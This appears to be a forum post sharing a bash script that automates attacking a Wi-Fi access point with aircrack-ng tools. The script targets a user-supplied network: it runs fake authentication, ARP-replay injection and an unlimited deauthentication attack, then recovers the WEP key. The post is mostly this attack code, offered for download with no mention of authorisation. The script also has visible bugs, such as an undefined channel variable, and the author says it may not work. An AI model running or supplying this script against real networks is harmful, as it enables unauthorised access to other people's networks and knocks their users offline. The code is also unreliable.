I created this simple script a very long time ago. So old I am not even sure that it even works anymore and don't let the script date fool you Code: Select All # Variables # interface = typically wlan0 or mon0 # MAC address = bssid XX:XX:XX:XX:XX # ssid = target network name # Channel = 1 - 14 # Stores your adapter to a variable: interface read -p "Enter the Interface you would like to use : " interface echo "" clear # This next lines of commands ask for the necessary information about your access point. read -p "Enter the Wi-Fi Access Points MAC Address : " mac echo "" clear read -p "Enter the Wi-Fi Access Points SSID : " ssid echo "" clear read -p "Enter the Wi-Fi Access Points Channel : " channel clear # This will verify the info you have just typed, and will ask you if it's correct. This will then store it to a variable: start echo "Is this correct? : Wi-Fi Card: Interface: $interface Interface's MAC: $hmac Transmission Rate: $rate Wi-Fi AP: Wi-Fi AP's MAC: $mac SSID: $ssid Channel: $channel " read -p "(Y/n) : " verifyap echo "" # Network Search sudo airodump-ng $interface # Channel Select sudo airodump-ng --channel $ch $interface # Network Identify sudo aireplay-ng --fakeauth 0 -a $mac -e $ssid $interface # Airdump Save sudo airodump-ng --channel $ch -w /root/Desktop/CrackFolder -i $interface # Injection Mode sudo aireplay-ng -3 -b $mac $interface # Keep aireplay-ng and airodump-ng running and run the deauth attack sudo aireplay-ng --deauth 0 -a $mac $interface # WEP Key Recovery-Tab New Console sudo aircrack-ng -0 -b $mac /root/Desktop/CrackFolder-01.ivs sleep 20 Note that if you download the attachment script that you might need to set permissions as 755 by chmod before you can run it as a script. E.g: Code: Select All sudo chmod 755 '/root/Desktop/Aircrack-ng-SCRIPTS/Other-Method.sh'